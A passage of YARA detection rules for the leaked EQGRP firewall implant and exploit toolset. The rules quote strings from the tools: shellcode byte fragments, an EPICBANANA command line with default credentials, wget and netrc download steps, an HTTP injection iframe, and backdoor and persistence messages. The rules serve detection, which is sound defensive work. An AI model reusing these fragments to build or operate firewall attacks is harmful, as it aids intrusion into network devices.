    $s4 = "^GET.*(?:/ |\\.(?:htm|asp|php)).*\\r\\n" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 204800 and all of them)
}

rule EQGRP_config_jp1_UA {
  meta:
    description = "EQGRP Toolset Firewall - file config_jp1_UA.pl"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "2f50b6e9891e4d7fd24cc467e7f5cfe348f56f6248929fec4bbee42a5001ae56"
  strings:
    $x1 = "This program will configure a JETPLOW Userarea file." ascii fullword
    $x2 = "Error running config_implant." ascii fullword
    $x3 = "NOTE:  IT ASSUMES YOU ARE OPERATING IN THE INSTALL/LP/JP DIRECTORY. THIS ASSUMPTION " ascii fullword
    $x4 = "First IP address for beacon destination [127.0.0.1]" ascii fullword
  condition:
    1 of them
}

rule EQGRP_userscript {
  meta:
    description = "EQGRP Toolset Firewall - file userscript.FW"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "5098ff110d1af56115e2c32f332ff6e3973fb7ceccbd317637c9a72a3baa43d7"
  strings:
    $x1 = "Are you sure? Don't forget that NETSCREEN firewalls require BANANALIAR!! " ascii fullword
  condition:
    1 of them
}

rule EQGRP_BBALL_M50FW08_2201 {
  meta:
    description = "EQGRP Toolset Firewall - file BBALL_M50FW08-2201.exe"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "80c0b68adb12bf3c15eff9db70a57ab999aad015da99c4417fdfd28156d8d3f7"
  strings:
    $s1 = ".got_loader" ascii fullword
    $s2 = "LOADED" ascii fullword
    $s3 = "pageTable.c" ascii fullword
    $s4 = "_start_text" ascii fullword
    $s5 = "handler_readBIOS" ascii fullword
    $s6 = "KEEPGOING" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 40960 and 5 of ($s*))
}

rule EQGRP_BUSURPER_3001_724 {
  meta:
    description = "EQGRP Toolset Firewall - file BUSURPER-3001-724.exe"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "6b558a6b8bf3735a869365256f9f2ad2ed75ccaa0eefdc61d6274df4705e978b"
  strings:
    $s1 = "IMPLANT" ascii fullword
    $s2 = "KEEPGOING" ascii fullword
    $s3 = "upgrade_implant" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 204800 and 2 of them) or (all of them)
}

rule EQGRP_workit {
  meta:
    description = "EQGRP Toolset Firewall - file workit.py"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "fb533b4d255b4e6072a4fa2e1794e38a165f9aa66033340c2f4f8fd1da155fac"
  strings:
    $s1 = "macdef init > /tmp/.netrc;" ascii fullword
    $s2 = "/usr/bin/wget http://" ascii fullword
    $s3 = "HOME=/tmp ftp" ascii fullword
    $s4 = " >> /tmp/.netrc;" ascii fullword
    $s5 = "/usr/rapidstream/bin/tftp" ascii fullword
    $s6 = "created shell_command:" ascii fullword
    $s7 = "rm -f /tmp/.netrc;" ascii fullword
    $s8 = "echo quit >> /tmp/.netrc;" ascii fullword
    $s9 = "echo binary >> /tmp/.netrc;" ascii fullword
    $s10 = "chmod 600 /tmp/.netrc;" ascii fullword
    $s11 = "created cli_command:" ascii fullword
  condition:
    6 of them
}

rule EQGRP_tinyhttp_setup {
  meta:
    description = "EQGRP Toolset Firewall - file tinyhttp_setup.sh"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "3d12c83067a9f40f2f5558d3cf3434bbc9a4c3bb9d66d0e3c0b09b9841c766a0"
  strings:
    $x1 = "firefox http://127.0.0.1:8000/$_name" ascii fullword
    $x2 = "What is the name of your implant:" ascii fullword
    $x3 = "killall thttpd" ascii fullword
    $x4 = "copy http://<IP>:80/$_name flash:/$_name" ascii fullword
  condition:
    (uint16(0) == 8483 and filesize < 2048 and 1 of ($x*)) or (all of them)
}

rule EQGRP_shellcode {
  meta:
    description = "EQGRP Toolset Firewall - file shellcode.py"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "ac9decb971dd44127a6ca0d35ac153951f0735bb4df422733046098eca8f8b7f"
  strings:
    $s1 = "execute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00" ascii
    $s2 = "tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00" ascii
    $s3 = "auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07" ascii
    $c1 = { E8 00 00 00 00 5D BE EF BE AD DE 89 F7 89 EC 29 F4 B8 03 00 00 00 }
    $c3 = { 31 C0 B0 03 31 DB 89 E1 31 D2 B6 F0 B2 0D CD 80 3D FF FF FF FF 75 07 }
  condition:
    1 of them
}

rule EQGRP_EPBA {
  meta:
    description = "EQGRP Toolset Firewall - file EPBA.script"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "53e1af1b410ace0934c152b5df717d8a5a8f5fdd8b9eb329a44d94c39b066ff7"
  strings:
    $x1 = "./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=NA -p 22 " ascii fullword
    $x2 = "-t TARGET_IP, --target_ip=TARGET_IP -- Either 127.0.0.1 or Win Ops IP" ascii fullword
    $x3 = "./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport RHP --dport RHP" ascii fullword
    $x4 = "--target_vers=TARGET_VERS    target Pix version (pix712, asa804) (REQUIRED)" ascii fullword
    $x5 = "-p DEST_PORT, --dest_port=DEST_PORT defaults: telnet=23, ssh=22 (optional) - Change to LOCAL redirect port" ascii fullword
    $x6 = "this operation is complete, BananaGlee will" ascii fullword
    $x7 = "cd /current/bin/FW/BGXXXX/Install/LP" ascii fullword
  condition:
    (uint16(0) == 8227 and filesize < 7168 and 1 of ($x*)) or (3 of them)
}

rule EQGRP_BPIE {
  meta:
    description = "EQGRP Toolset Firewall - file BPIE-2201.exe"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "697e80cf2595c85f7c931693946d295994c55da17a400f2c9674014f130b4688"
  strings:
    $s1 = "profProcessPacket" ascii fullword
    $s2 = ".got_loader" ascii fullword
    $s3 = "getTimeSlotCmdHandler" ascii fullword
    $s4 = "getIpIpCmdHandler" ascii fullword
    $s5 = "LOADED" ascii fullword
    $s6 = "profStartScan" ascii fullword
    $s7 = "tmpData.1" ascii fullword
    $s8 = "resetCmdHandler" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 71680 and 6 of ($s*))
}

rule EQGRP_jetplow_SH {
  meta:
    description = "EQGRP Toolset Firewall - file jetplow.sh"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "ee266f84a1a4ccf2e789a73b0a11242223ed6eba6868875b5922aea931a2199c"
  strings:
    $s1 = "cd /current/bin/FW/BANANAGLEE/$bgver/Install/LP/jetplow" ascii fullword
    $s2 = "***** Please place your UA in /current/bin/FW/OPS *****" ascii fullword
    $s3 = "ln -s ../jp/orig_code.bin orig_code_pixGen.bin" ascii fullword
    $s4 = "*****             Welcome to JetPlow              *****" ascii fullword
  condition:
    1 of them
}

rule EQGRP_BBANJO {
  meta:
    description = "EQGRP Toolset Firewall - file BBANJO-3011.exe"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "f09c2f90464781a08436321f6549d350ecef3d92b4f25b95518760f5d4c9b2c3"
  strings:
    $s1 = "get_lsl_interfaces" ascii fullword
    $s2 = "encryptFC4Payload" ascii fullword
    $s3 = ".got_loader" ascii fullword
    $s4 = "beacon_getconfig" ascii fullword
    $s5 = "LOADED" ascii fullword
    $s6 = "FormBeaconPacket" ascii fullword
    $s7 = "beacon_reconfigure" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 51200 and all of them)
}

rule EQGRP_BPATROL_2201 {
  meta:
    description = "EQGRP Toolset Firewall - file BPATROL-2201.exe"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "aa892750b893033eed2fedb2f4d872f79421174eb217f0c34a933c424ae66395"
  strings:
    $s1 = "dumpConfig" ascii fullword
    $s2 = "getstatusHandler" ascii fullword
    $s3 = ".got_loader" ascii fullword
    $s4 = "xtractdata" ascii fullword
    $s5 = "KEEPGOING" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 40960 and all of them)
}

rule EQGRP_extrabacon {
  meta:
    description = "EQGRP Toolset Firewall - file extrabacon_1.1.0.1.py"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "59d60835fe200515ece36a6e87e642ee8059a40cb04ba5f4b9cce7374a3e7735"
  strings:
    $x1 = "To disable password checking on target:" ascii fullword
    $x2 = "[-] target is running" ascii fullword
    $x3 = "[-] problem importing version-specific shellcode from" ascii fullword
    $x4 = "[+] importing version-specific shellcode" ascii fullword
    $s5 = "[-] unsupported target version, abort" ascii fullword
  condition:
    1 of them
}

rule EQGRP_sploit_py {
  meta:
    description = "EQGRP Toolset Firewall - file sploit.py"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
  strings:
    $x1 = "the --spoof option requires 3 or 4 fields as follows redir_ip" ascii
    $x2 = "[-] timeout waiting for response - target may have crashed" ascii fullword
    $x3 = "[-] no response from health check - target may have crashed" ascii fullword
  condition:
    1 of them
}

rule EQGRP_uninstallPBD {
  meta:
    description = "EQGRP Toolset Firewall - file uninstallPBD.bat"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "692fdb449f10057a114cf2963000f52ce118d9a40682194838006c66af159bd0"
  strings:
    $s1 = "memset 00e9a05c 4 38845b88" ascii fullword
    $s2 = "_hidecmd" ascii fullword
    $s3 = "memset 013abd04 1 0d" ascii fullword
  condition:
    all of them
}

rule EQGRP_BICECREAM {
  meta:
    description = "EQGRP Toolset Firewall - file BICECREAM-2140"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "4842076af9ba49e6dfae21cf39847b4172c06a0bd3d2f1ca6f30622e14b77210"
  strings:
    $s1 = "Could not connect to target device: %s:%d. Please check IP address." ascii fullword
    $s2 = "command data size is invalid for an exec cmd" ascii fullword
    $s3 = "A script was specified but target is not a PPC405-based NetScreen (NS5XT, NS25, and NS50). Executing scripts is supported but ma" ascii
    $s4 = "Execute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]" ascii fullword
    $s5 = "Execute 0x%08x with args (%08x, %08x, %08x): [y/n]" ascii fullword
    $s6 = "[%d] Execute code." ascii fullword
    $s7 = "Execute 0x%08x with args (%08x): [y/n]" ascii fullword
    $s8 = "dump_value_LHASH_DOALL_ARG" ascii fullword
    $s9 = "Eggcode is complete. Pass execution to it? [y/n]" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 5120000 and 2 of them) or (5 of them)
}

rule EQGRP_create_http_injection {
  meta:
    description = "EQGRP Toolset Firewall - file create_http_injection.py"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "de52f5621b4f3896d4bd1fb93ee8be827e71a2b189a9f8552b68baed062a992d"
  strings:
    $x1 = "required by SECONDDATE" ascii fullword
    $s1 = "help='Output file name (optional). By default the resulting data is written to stdout.')" ascii fullword
    $s2 = "data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"" ascii
    $s3 = "version='%prog 1.0'," ascii fullword
    $s4 = "usage='%prog [ ... options ... ] url'," ascii fullword
  condition:
    (uint16(0) == 8483 and filesize < 3072 and ($x1 or 2 of them)) or (all of them)
}

rule EQGRP_BFLEA_2201 {
  meta:
    description = "EQGRP Toolset Firewall - file BFLEA-2201.exe"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "15e8c743770e44314496c5f27b6297c5d7a4af09404c4aa507757e0cc8edc79e"
  strings:
    $s1 = ".got_loader" ascii fullword
    $s2 = "LOADED" ascii fullword
    $s3 = "readFlashHandler" ascii fullword
    $s4 = "KEEPGOING" ascii fullword
    $s5 = "flashRtnsPix6x.c" ascii fullword
    $s6 = "fix_ip_cksum_incr" ascii fullword
    $s7 = "writeFlashHandler" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 30720 and 5 of them) or (all of them)
}

rule EQGRP_BpfCreator_RHEL4 {
  meta:
    description = "EQGRP Toolset Firewall - file BpfCreator-RHEL4"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "bd7303393409623cabf0fcf2127a0b81fae52fe40a0d2b8db0f9f092902bbd92"
  strings:
    $s1 = "usage %s \"<tcpdump pcap string>\" <outfile>" ascii fullword
    $s2 = "error reading dump file: %s" ascii fullword
    $s3 = "truncated dump file; tried to read %u captured bytes, only got %lu" ascii fullword
    $s4 = "%s: link-layer type %d isn't supported in savefiles" ascii fullword
    $s5 = "DLT %d is not one of the DLTs supported by this device" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 2048000 and all of them)
}

rule EQGRP_StoreFc {
  meta:
    description = "EQGRP Toolset Firewall - file StoreFc.py"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "f155cce4eecff8598243a721389046ae2b6ca8ba6cb7b4ac00fd724601a56108"
  strings:
    $x1 = "Usage: StoreFc.py --configFile=<path to xml file> --implantFile=<path to BinStore implant> [--outputFile=<file to write the conf" ascii
    $x2 = "raise Exception, \"Must supply both a config file and implant file.\"" ascii fullword
    $x3 = "This is wrapper for Store.py that FELONYCROWBAR will use. This" ascii fullword
  condition:
    1 of them
}

rule EQGRP_hexdump {
  meta:
    description = "EQGRP Toolset Firewall - file hexdump.py"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "95a9a6a8de60d3215c1c9f82d2d8b2640b42f5cabdc8b50bd1f4be2ea9d7575a"
  strings:
    $s1 = "def hexdump(x,lead=\"[+] \",out=sys.stdout):" ascii fullword
    $s2 = "print >>out, \"%s%04x  \" % (lead,i)," ascii fullword
    $s3 = "print >>out, \"%02X\" % ord(x[i+j])," ascii fullword
    $s4 = "print >>out, sane(x[i:i+16])" ascii fullword
  condition:
    (uint16(0) == 8483 and filesize < 1024 and 2 of ($s*)) or (all of them)
}

rule EQGRP_BBALL {
  meta:
    description = "EQGRP Toolset Firewall - file BBALL_E28F6-2201.exe"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    hash1 = "498fc9f20b938b8111adfa3ca215325f265a08092eefd5300c4168876deb7bf6"
  strings:
    $s1 = "Components/Modules/BiosModule/Implant/E28F6/../e28f640j3_asm.S" ascii fullword
    $s2 = ".got_loader" ascii fullword
    $s3 = "handler_readBIOS" ascii fullword
    $s4 = "cmosReadByte" ascii fullword
    $s5 = "KEEPGOING" ascii fullword
    $s6 = "checksumAreaConfirmed.0" ascii fullword
    $s7 = "writeSpeedPlow.c" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 40960 and 4 of ($s*)) or (all of them)
}

rule EQGRP_BARPUNCH_BPICKER {
  meta:
    description = "EQGRP Toolset Firewall - from files BARPUNCH-3110, BPICKER-3100"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    super_rule = 1
    hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
    hash2 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
  strings:
    $x1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u" ascii fullword
    $x2 = "%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]" ascii fullword
    $x3 = "* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)" ascii fullword
    $x4 = "%s version %s already has persistence installed. If you want to uninstall," ascii fullword
    $x5 = "The active module(s) on the target are not meant to be persisted" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 6144000 and 1 of them) or (3 of them)
}

rule EQGRP_Implants_Gen6 {
  meta:
    description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, writeJetPlow-2130"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    super_rule = 1
    hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
    hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
    hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
    hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
    hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
    hash6 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
    hash7 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
  strings:
    $s1 = "LP.c:pixSecurity - Improper number of bytes read in Security/Interface Information" ascii fullword
    $s2 = "LP.c:pixSecurity - Not in Session" ascii fullword
    $s3 = "getModInterface__preloadedModules" ascii fullword
    $s4 = "showCommands" ascii fullword
    $s5 = "readModuleInterface" ascii fullword
    $s6 = "Wrapping_Not_Necessary_Or_Wrapping_Ok" ascii fullword
    $s7 = "Get_CMD_List" ascii fullword
    $s8 = "LP_Listen2" ascii fullword
    $s9 = "killCmdList" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 6144000 and all of them)
}

rule EQGRP_Implants_Gen5 {
  meta:
    description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, writeJetPlow-2130"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    super_rule = 1
    hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
    hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
    hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
    hash4 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
    hash5 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
    hash6 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
    hash7 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
    hash8 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
  strings:
    $x1 = "Module and Implant versions do not match.  This module is not compatible with the target implant" ascii fullword
    $s1 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.log" ascii fullword
    $s2 = "%s/BF_%04d%02d%02d.log" ascii fullword
    $s3 = "%s/BF_READ_%08x_%04d%02d%02d_%02d%02d%02d.bin" ascii fullword
  condition:
    (uint16(0) == 17791 and 1 of ($x*)) or (all of them)
}

rule EQGRP_pandarock {
  meta:
    description = "EQGRP Toolset Firewall - from files pandarock_v1.11.1.1.bin, pit"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    super_rule = 1
    hash1 = "1214e282ac7258e616ebd76f912d4b2455d1b415b7216823caa3fc0d09045a5f"
    hash2 = "c8a151df7605cb48feb8be2ab43ec965b561d2b6e2a837d645fdf6a6191ab5fe"
  strings:
    $x1 = "* Not attempting to execute \"%s\" command" ascii fullword
    $x2 = "TERMINATING SCRIPT (command error or \"quit\" encountered)" ascii fullword
    $x3 = "execute code in <file> passing <argX> (HEX)" ascii fullword
    $x4 = "* Use arrow keys to scroll through command history" ascii fullword
    $s1 = "pitCmd_processCmdLine" ascii fullword
    $s2 = "execute all commands in <file>" ascii fullword
    $s3 = "__processShellCmd" ascii fullword
    $s4 = "pitTarget_getDstPort" ascii fullword
    $s5 = "__processSetTargetIp" ascii fullword
    $o1 = "Logging commands and output - ON" ascii fullword
    $o2 = "This command is too dangerous.  If you'd like to run it, contact the development team" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 3072000 and 1 of ($x*)) or (4 of them) or 1 of ($o*)
}

rule EQGRP_BananaUsurper_writeJetPlow {
  meta:
    description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, writeJetPlow-2130"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    super_rule = 1
    hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
    hash2 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
  strings:
    $x1 = "Implant Version-Specific Values:" ascii fullword
    $x2 = "This function should not be used with a Netscreen, something has gone horribly wrong" ascii fullword
    $s1 = "createSendRecv: recv'd an error from the target." ascii fullword
    $s2 = "Error: WatchDogTimeout read returned %d instead of 4" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 2048000 and 1 of ($x*)) or (3 of them)
}

rule EQGRP_Implants_Gen4 {
  meta:
    description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    super_rule = 1
    hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
    hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
    hash3 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
    hash4 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
  strings:
    $s1 = "Command has not yet been coded" ascii fullword
    $s2 = "Beacon Domain  : www.%s.com" ascii fullword
    $s3 = "This command can only be run on a PIX/ASA" ascii fullword
    $s4 = "Warning! Bad or missing Flash values (in section 2 of .dat file)" ascii fullword
    $s5 = "Printing the interface info and security levels. PIX ONLY." ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 3072000 and 3 of them) or (all of them)
}

rule EQGRP_Implants_Gen3 {
  meta:
    description = "EQGRP Toolset Firewall - from files BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    super_rule = 1
    hash1 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
    hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
    hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
    hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
    hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
    hash6 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
  strings:
    $x1 = "incomplete and must be removed manually.)" ascii fullword
    $s1 = "%s: recv'd an error from the target." ascii fullword
    $s2 = "Unable to fetch the address to the get_uptime_secs function for this OS version" ascii fullword
    $s3 = "upload/activate/de-activate/remove/cmd function failed" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 6144000 and 2 of them) or (all of them)
}

rule EQGRP_BLIAR_BLIQUER {
  meta:
    description = "EQGRP Toolset Firewall - from files BLIAR-2110, BLIQUER-2230"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    super_rule = 1
    hash1 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
    hash2 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
  strings:
    $x1 = "Do you wish to activate the implant that is already on the firewall? (y/n): " ascii fullword
    $x2 = "There is no implant present on the firewall." ascii fullword
    $x3 = "Implant Version :%lx%lx%lx" ascii fullword
    $x4 = "You may now connect to the implant using the pbd idkey" ascii fullword
    $x5 = "No reply from persistant back door." ascii fullword
    $x6 = "rm -rf pbd.wc; wc -c %s > pbd.wc" ascii fullword
    $p1 = "PBD_GetVersion" ascii fullword
    $p2 = "pbd/pbdEncrypt.bin" ascii fullword
    $p3 = "pbd/pbdGetVersion.pkt" ascii fullword
    $p4 = "pbd/pbdStartWrite.bin" ascii fullword
    $p5 = "pbd/pbd_setNewHookPt.pkt" ascii fullword
    $p6 = "pbd/pbd_Upload_SinglePkt.pkt" ascii fullword
    $s1 = "Unable to fetch hook and jmp addresses for this OS version" ascii fullword
    $s2 = "Could not get hook and jump addresses" ascii fullword
    $s3 = "Enter the name of a clean implant binary (NOT an image):" ascii fullword
    $s4 = "Unable to read dat file for OS version 0x%08lx" ascii fullword
    $s5 = "Invalid implant file" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 3072000 and (1 of ($x*) or 1 of ($p*))) or (3 of them)
}

rule EQGRP_sploit {
  meta:
    description = "EQGRP Toolset Firewall - from files sploit.py, sploit.py"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    super_rule = 1
    hash1 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
    hash2 = "0316d70a5bbf068a7fc791e08e816015d04ec98f088a7ff42af8b9e769b8d1f6"
  strings:
    $s1 = "print \"[+] Connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])" ascii fullword
    $s2 = "@overridable(\"Must be overriden if the target will be touched.  Base implementation should not be called.\")" ascii fullword
    $s3 = "@overridable(\"Must be overriden.  Base implementation should not be called.\")" ascii fullword
    $s4 = "exp.load_vinfo()" ascii fullword
    $s5 = "if not okay and self.terminateFlingOnException:" ascii fullword
    $s6 = "print \"[-] keyboard interrupt before response received\"" ascii fullword
    $s7 = "if self.terminateFlingOnException:" ascii fullword
    $s8 = "print 'Debug info ','='*40" ascii fullword
  condition:
    (uint16(0) == 8483 and filesize < 92160 and 1 of ($s*)) or (4 of them)
}

rule EQGRP_Implants_Gen2 {
  meta:
    description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, writeJetPlow-2130"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    super_rule = 1
    hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
    hash2 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
    hash3 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
    hash4 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
    hash5 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
    hash6 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
  strings:
    $x1 = "Modules persistence file written successfully" ascii fullword
    $x2 = "Modules persistence data successfully removed" ascii fullword
    $x3 = "No Modules are active on the firewall, nothing to persist" ascii fullword
    $s1 = "--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s " ascii fullword
    $s2 = "Error while attemping to persist modules:" ascii fullword
    $s3 = "Error while reading interface info from PIX" ascii fullword
    $s4 = "LP.c:pixFree - Failed to get response" ascii fullword
    $s5 = "WARNING: LP Timeout specified (%lu seconds) less than default (%u seconds).  Setting default" ascii fullword
    $s6 = "Unable to fetch config address for this OS version" ascii fullword
    $s7 = "LP.c: interface information not available for this session" ascii fullword
    $s8 = "[%s:%s:%d] ERROR: " ascii fullword
    $s9 = "extract_fgbg" ascii fullword
  condition:
    (uint16(0) == 17791 and filesize < 3072000 and 1 of ($x*)) or (5 of them)
}

rule EQGRP_Implants_Gen1 {
  meta:
    description = "EQGRP Toolset Firewall - from files BananaUsurper-2120, BARPUNCH-3110, BLIAR-2110, BLIQUER-2230, BLIQUER-3030, BLIQUER-3120, BPICKER-3100, lpexe, writeJetPlow-2130"
    author = "Florian Roth"
    reference = "Research"
    date = "2016-08-16"
    super_rule = 1
    hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
    hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
    hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
    hash4 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
    hash5 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
    hash6 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
    hash7 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
    hash8 = "ee3e3487a9582181892e27b4078c5a3cb47bb31fc607634468cc67753f7e61d7"
    hash9 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
  strings:
    $s1 = "WARNING:  Session may not have been closed!" ascii fullword
    $s2 = "EXEC Packet Processed" ascii fullword
    $s3 = "Failed to insert the command into command list." ascii fullword
